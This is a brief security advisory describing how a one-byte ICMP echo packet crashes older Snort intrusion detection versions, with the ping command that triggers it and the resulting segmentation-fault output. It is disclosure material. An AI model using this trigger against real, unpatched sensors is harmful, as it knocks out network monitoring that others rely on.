Linux-*nix-Security: Snort Core Dump Vulnerability
Source: Zero Security
It is possible to cause Snort, an open source network intrusion detection tool, to core dump by sending it an extremely small ICMP ECHO packet.
Vulnerable systems:
Snort version 1.8 and prior (without the patch)
Example:
Run snort:
# snort -dev host 192.168.0.3 and 192.168.0.1
Ping 192.168.0.1 from 192.168.0.3 within one data in payload:
# ping -c 1 -s 1 192.168.0.1
Snort´s output showed below:
-*> Snort! <*-
Version 1.8.3 (Build 88)
By Martin Roesch (roesch@sourcefire.com, www.snort.org)
01/10-11:34:43.898282 0:80:AD:78:83:BB -> 0:E0:18:C4:52:76
type:0x800 len:0x2B 192.168.0.3 ->
192.168.0.1 ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:29 DF Type:8 Code:0 ID:9435 Seq:0 ECHO
Segmentation fault (core dumped)